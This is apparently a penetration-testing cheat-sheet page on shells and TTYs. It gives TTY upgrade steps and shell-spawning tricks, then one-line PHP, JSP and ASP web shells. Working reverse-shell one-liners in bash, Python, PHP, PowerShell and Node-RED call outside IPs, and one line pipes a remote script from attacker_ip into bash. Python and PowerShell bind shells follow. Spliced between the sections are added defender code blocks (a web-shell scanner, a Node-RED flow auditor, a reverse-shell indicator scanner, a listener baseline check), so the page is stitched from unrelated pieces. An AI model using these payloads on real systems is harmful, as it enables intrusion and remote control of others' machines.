P4n1cBook

Shells/TTYs

TTYs and Shells

TTY - Teletypewriters

Full TTY

BASH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Clear Terminal

Set the TERM environment variable to xterm so the remote side knows how to clear and redraw the screen:

Change TERM to xterm
export TERM=xterm

Terminal Size

Sometimes you need to match the remote terminal size to your own, otherwise editors and pagers draw incorrectly.

Check your terminal size
stty size
Now, change it in the target
stty rows <NUMBER> columns <NUMBER>

Use arrow keys

Spawn bash; its line editor handles arrow keys and history
bash
Turn history on
set -o history
  • In the .bashrc file, make sure HISTSIZE is not set to 0:

HISTSIZE=1000
HISTFILESIZE=1000

rlwrap enables line editing and history:

Listener example
rlwrap nc -lvnp <port>
Connection example
rlwrap nc 10.10.10.131 6200
Spawning Shells

The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")' 

The script command starts a shell session and records it to a file. Here /dev/null is given as the output file, so nothing is actually logged:

script -qc /bin/bash /dev/null

If you are already inside a Python interpreter (a REPL), pass os.system('/bin/bash') to it:

import os; os.system('/bin/bash')

Spawn an interactive shell directly from the terminal:

/bin/sh -i

The command exec "/bin/sh" replaces the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'
Or, from inside a running Perl interpreter
perl: exec "/bin/sh";

Ruby's exec function, like in Perl, replaces the current process with a new process—in this case, /bin/sh:

ruby: exec "/bin/sh"

Runs a shell command from Lua, but unlike in Perl or Ruby, this does not replace the current process. It runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

From vim, run an external shell command:

:!bash

Change the default shell used by vim's :! command, then open it with :shell:

:set shell=/bin/bash
:shell

Spawn a shell from nmap's interactive mode (nmap --interactive, only present in older versions), so shell commands can be run while scanning:

!sh

PSY

PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop), normally used for debugging.

Print the working directory
getcwd()
Print the current user
get_current_user()
Print system info
phpinfo()
Print contents from directory
scandir("/home")
Print content from file
file_get_contents("/etc/os-release")
Web Shells

Save the shell to a file (double quotes inside, so the outer single quotes are not broken)

echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php
PHP Shell
<?php system($_REQUEST['cmd']); ?>
JSP - Java Server Pages
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP - Active Server Pages
<% eval request("cmd") %>
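Defender's view of the three one-line web shells above, added here as an example and not code from P4n1cBook: a signature scan that flags a file only when a command-execution sink (system, exec, eval, Runtime.exec) is fed straight from request input. The rule names, the regexes and the sample upload directory are constructed assumptions.

```python
"""Signature scan for the one-line web shells shown above (PHP, JSP, ASP).

Added example for defenders, not code from P4n1cBook: the rule names, the
regexes and the sample upload directory below are constructed assumptions.
The rules fire only when a command-execution sink is fed directly from
request input, so code that calls system() on a fixed string is not flagged.
"""
import re

# (rule name, pattern): a command sink whose argument comes straight from the request.
SIGNATURES = [
    ("php_request_to_exec",
     re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open|eval)"
                r"\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b", re.I)),
    ("jsp_request_to_exec",
     re.compile(r"Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter\(")),
    ("asp_eval_request",
     re.compile(r"\beval\s*\(?\s*request\s*\(", re.I)),
]


def scan_source(text):
    """Return the names of every signature that matches, in table order."""
    return [name for name, pattern in SIGNATURES if pattern.search(text)]


def scan_files(files):
    """files: iterable of (path, content) pairs, e.g. from walking an upload
    directory. Returns {path: [rule names]} containing only the files that hit."""
    hits = {}
    for path, content in files:
        found = scan_source(content)
        if found:
            hits[path] = found
    return hits


# Constructed sample upload directory: the three shells from the page in the
# same form, plus two benign files (one reads request input without a command
# sink, one calls a sink on a fixed string) that must not be flagged.
SAMPLE_FILES = [
    ("uploads/cmd.php", "<?php system($_REQUEST['cmd']); ?>"),
    ("uploads/cmd.jsp", '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'),
    ("uploads/cmd.asp", '<% eval request("cmd") %>'),
    ("uploads/hello.php", "<?php echo htmlspecialchars($_GET['name']); ?>"),
    ("uploads/cron.php", '<?php system("ls -la /var/www"); ?>'),
]

if __name__ == "__main__":
    for path, rules in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(rules)}")
```

Run it over a web root's upload directories on a schedule; a hit on a freshly written file is a strong signal even before any request reaches it.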
BASH Reverse Shells
Standard
bash -i >& /dev/tcp/10.10.14.18/1337 0>&1
URL
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
URL Encoded
rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f
Run it in the background
nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &
Python Reverse Shells

PTY

One-liner IPv4
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Save in a file IPv4
echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

subprocess

One-liner IPv4
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Save it in a file IPv4
echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py
UDP Reverse shell
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()
PHP Reverse shell
Direct reverse shell
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.17/4444 0>&1'");?>
Remote reverse shell
<?php system("curl http://attacker_ip/reverseshell | bash"); ?>
FIFO
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <Port> >/tmp/f"); ?>
Powershell Reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Node-Red Reverse shell
Import it
[{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"10.10.14.126","port":"9999","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}]
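Defender's check for the flow shape just shown (tcp in wired into an exec node with addpay set and an empty command), added here as an example and not code from P4n1cBook or from Node-RED: it walks a flow export, follows wires backwards from every exec node and reports those whose command line can be set by a network-fed payload. The node-type set and both sample flows are constructed (192.0.2.10 is a documentation address).

```python
"""Audit a Node-RED flow export for exec nodes whose command is controlled by
a network input, the shape of the flow above (tcp in -> exec -> tcp out).

Added example, not part of P4n1cBook or of Node-RED: the node-type set and
the two constructed flows below are assumptions. Input is the list of node
objects as exported from the editor (the same format as the JSON above).
"""
import json

# Core Node-RED nodes that deliver externally supplied data as msg.payload.
NETWORK_INPUTS = {"tcp in", "udp in", "http in", "websocket in", "mqtt in"}


def upstream_map(nodes):
    """Invert the 'wires' lists: node id -> set of ids wired into it."""
    upstream = {n["id"]: set() for n in nodes if "id" in n}
    for node in nodes:
        for output_port in node.get("wires", []):
            for target in output_port:
                if target in upstream:
                    upstream[target].add(node["id"])
    return upstream


def reachable_from(node_id, upstream):
    """All nodes that can feed node_id, following wires backwards (transitively)."""
    seen, stack = set(), list(upstream.get(node_id, ()))
    while stack:
        current = stack.pop()
        if current not in seen:
            seen.add(current)
            stack.extend(upstream.get(current, ()))
    return seen


def audit_flow(nodes):
    """One finding per exec node whose command line can be set by a network-fed
    payload: 'addpay' appends msg.payload to the command, or 'command' is empty
    so the payload is the whole command."""
    by_id = {n["id"]: n for n in nodes if "id" in n}
    upstream = upstream_map(nodes)
    findings = []
    for node in nodes:
        if node.get("type") != "exec":
            continue
        addpay = str(node.get("addpay", False)).lower() == "true"
        payload_sets_command = addpay or not node.get("command")
        sources = [by_id[s] for s in reachable_from(node["id"], upstream)
                   if by_id[s].get("type") in NETWORK_INPUTS]
        if payload_sets_command and sources:
            findings.append({
                "exec_node": node["id"],
                "sources": sorted((s["type"], s.get("host", ""), s.get("port", ""))
                                  for s in sources),
            })
    return findings


# Constructed flow in the shape of the export above.
SUSPICIOUS_FLOW = json.loads("""[
 {"id":"tab1","type":"tab","label":"Flow 1"},
 {"id":"in1","type":"tcp in","z":"tab1","server":"client","host":"192.0.2.10","port":"9999",
  "datamode":"stream","datatype":"buffer","wires":[["exec1"]]},
 {"id":"exec1","type":"exec","z":"tab1","command":"","addpay":true,"append":"",
  "useSpawn":"false","wires":[["out1"],["out1"],["out1"]]},
 {"id":"out1","type":"tcp out","z":"tab1","beserver":"reply","wires":[]}
]""")

# Constructed benign flow: a timer-driven exec with a fixed command and no payload appended.
BENIGN_FLOW = json.loads("""[
 {"id":"tab2","type":"tab","label":"Flow 2"},
 {"id":"inj1","type":"inject","z":"tab2","repeat":"60","wires":[["exec2"]]},
 {"id":"exec2","type":"exec","z":"tab2","command":"df -h","addpay":false,"wires":[["dbg1"],[],[]]},
 {"id":"dbg1","type":"debug","z":"tab2","wires":[]}
]""")

if __name__ == "__main__":
    for finding in audit_flow(SUSPICIOUS_FLOW):
        print(finding)
```

Point it at the flows file of a Node-RED instance (or at what the admin API returns) as part of a configuration review; any hit means an unauthenticated network peer can run commands as the Node-RED user.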
  • Once you receive the connection, connect back to another listener to get a more stable shell:

bash -c "bash -i > /dev/tcp/10.10.14.172/3000 0>&1" &
  • Then use script:

script -qc /bin/bash /dev/null
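Defender's view of the one-liners in this section and the TTY spawns before it (the /dev/tcp redirect and its URL-encoded form, the mkfifo/nc pipe, the Python socket/dup2/pty.spawn chain, script with /dev/null, the Perl exec and the PowerShell TCPClient loop), added here as an example and not code from P4n1cBook: a Python pass over process command lines that reports which pattern each line matches and pulls out the remote endpoint when the command embeds one. The indicator table, the endpoint extractors and the sample command lines are constructed assumptions; the samples reuse the page's own example addresses.

```python
"""Command-line indicators for the reverse-shell and TTY-upgrade one-liners above.

Added example for defenders, not code from P4n1cBook: the INDICATORS table,
the endpoint extractors and the constructed sample command lines are all
assumptions. Input is whatever your process auditing yields (auditd execve
records, EDR telemetry, `ps -eo args`), one command line per string; output is
which pattern matched and, where the command embeds one, the remote endpoint.
"""
import re
from urllib.parse import unquote_plus

INDICATORS = [
    ("bash_dev_tcp",         re.compile(r"/dev/(tcp|udp)/\S+")),
    ("fifo_netcat",          re.compile(r"mkfifo\s+\S+.*\b(nc|ncat|netcat)\b", re.S)),
    ("python_socket_dup2",   re.compile(r"socket\.socket\(.*dup2\(", re.S)),
    ("pty_spawn",            re.compile(r"pty\.spawn\(")),
    ("script_null_log",      re.compile(r"\bscript\s+-q?c\s+\S+\s+/dev/null")),
    ("interpreter_exec_sh",  re.compile(r"\bexec\s*\(?\s*['\"]/bin/(ba)?sh['\"]")),
    ("powershell_tcpclient", re.compile(r"Sockets\.TCPClient\(.*\.GetStream\(", re.I | re.S)),
]

# Where the remote end is written into the command itself.
ENDPOINT_PATTERNS = [
    re.compile(r"/dev/(?:tcp|udp)/([\w.:-]+)/(\d+)"),
    re.compile(r"connect\(\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)\s*\)\)"),
    re.compile(r"\b(?:nc|ncat|netcat)\b(?:\s+-\w+)*\s+([\w.:-]+)\s+(\d+)"),
    re.compile(r"TCPClient\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)", re.I),
]

_PERCENT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")


def normalise(cmdline):
    """URL-decode once when the line carries %XX escapes (a payload lifted from a
    web-server log), so encoded and plain forms are matched by the same rules."""
    return unquote_plus(cmdline) if _PERCENT_ESCAPE.search(cmdline) else cmdline


def extract_endpoint(text):
    """(host, port) from the first endpoint pattern that matches, else None."""
    for pattern in ENDPOINT_PATTERNS:
        match = pattern.search(text)
        if match:
            return match.group(1), int(match.group(2))
    return None


def classify(cmdline):
    """(matched indicator names in table order, (host, port) or None)."""
    text = normalise(cmdline)
    names = [name for name, pattern in INDICATORS if pattern.search(text)]
    return names, (extract_endpoint(text) if names else None)


def scan(cmdlines):
    """One finding per suspicious command line; clean lines are dropped."""
    findings = []
    for line in cmdlines:
        names, endpoint = classify(line)
        if names:
            findings.append({"cmdline": line, "indicators": names, "endpoint": endpoint})
    return findings


# Constructed sample: the page's forms (addresses are the page's examples) plus two benign lines.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.10.14.18/1337 0>&1",
    "bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f",
    "python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.10.16.6\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
    "script -qc /bin/bash /dev/null",
    "perl -e 'exec \"/bin/sh\";'",
    "bash -c \"tar czf /backup/www.tgz /var/www\"",
    "python3 -c 'import socket; print(socket.gethostname())'",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding["indicators"], finding["endpoint"], "<-", finding["cmdline"][:60])
```

The extracted endpoint is what you pivot on next: correlate it with egress flow logs, and treat a pty.spawn or script /dev/null execution with no terminal parent as the tell-tale of an upgraded reverse shell rather than an interactive login.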
Bind Shells
  • First, find ports where inbound connections are allowed:

Linux
ss -tuln
netstat -tuln
lsof -i -n
Windows
netstat -ano | findstr "LISTEN"
Get-Process | Where-Object { $_.Id -in (Get-NetTCPConnection -State Listen).OwningProcess }

Check the firewall rules in Windows:

netsh advfirewall firewall show rule name=all
Python Shell
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
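Defender's counterpart to the port inventory at the start of this section, added here as an example and not code from P4n1cBook: it parses the ss -tuln and netstat -ano output forms listed above and diffs the listeners against a per-host baseline, so a new listener bound to all interfaces (what either bind shell above creates) stands out. The Listener record, the baseline sets and both sample outputs are constructed.

```python
"""Baseline check for the listening-port inventory step above: parse the
Linux `ss -tuln` and Windows `netstat -ano` outputs, then report listeners
that are not in the host's expected set, highlighting those bound to every
interface (the ones a bind shell would use).

Added example for defenders, not code from P4n1cBook: the Listener record,
the baselines and both sample outputs are constructed assumptions.
"""
from collections import namedtuple

# pid is None when the tool's output does not include it (ss without -p).
Listener = namedtuple("Listener", "proto addr port pid")
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}


def parse_ss(output):
    """`ss -tuln` rows: Netid State Recv-Q Send-Q Local_Address:Port Peer_Address:Port."""
    listeners = []
    for line in output.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] not in ("tcp", "udp"):
            continue  # header or unrelated line
        addr, port = cols[4].rsplit(":", 1)
        listeners.append(Listener(cols[0], addr.split("%")[0], int(port), None))
    return listeners


def parse_netstat_windows(output):
    """`netstat -ano` rows: Proto Local_Address Foreign_Address State PID (UDP has no State)."""
    listeners = []
    for line in output.splitlines():
        cols = line.split()
        if not cols or cols[0] not in ("TCP", "UDP"):
            continue
        if cols[0] == "TCP" and cols[3] != "LISTENING":
            continue  # established / time-wait entries are not listeners
        addr, port = cols[1].rsplit(":", 1)
        listeners.append(Listener(cols[0].lower(), addr, int(port), int(cols[-1])))
    return listeners


def review(listeners, baseline):
    """baseline: set of (proto, port) expected on this host. Returns the
    unexpected listeners and the subset of those bound to all interfaces."""
    unexpected = [l for l in listeners if (l.proto, l.port) not in baseline]
    exposed = [l for l in unexpected if l.addr in WILDCARD_ADDRS]
    return {"unexpected": unexpected, "exposed": exposed}


# Constructed sample outputs; port 1234 is the bind-shell port used in the examples above.
SS_SAMPLE = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53    0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      511    *:80                *:*
tcp   LISTEN 0      1      0.0.0.0:1234        0.0.0.0:*
tcp   LISTEN 0      128    [::]:22             [::]:*
"""
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1234           0.0.0.0:0              LISTENING       5120
  TCP    10.0.0.5:49712         10.0.0.9:443           ESTABLISHED     3320
  UDP    0.0.0.0:5355           *:*                                    1388
"""
LINUX_BASELINE = {("tcp", 22), ("tcp", 80), ("udp", 53)}
WINDOWS_BASELINE = {("tcp", 135), ("tcp", 445), ("udp", 5355)}

if __name__ == "__main__":
    for name, result in (("linux", review(parse_ss(SS_SAMPLE), LINUX_BASELINE)),
                         ("windows", review(parse_netstat_windows(NETSTAT_SAMPLE), WINDOWS_BASELINE))):
        for l in result["exposed"]:
            print(f"{name}: unexpected wildcard listener {l.proto}/{l.port} pid={l.pid}")
```

Keep the baseline per host role rather than per machine, and feed the pid from the Windows output straight into the Get-Process lookup shown above to identify the owning binary.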

Last updated 2 months ago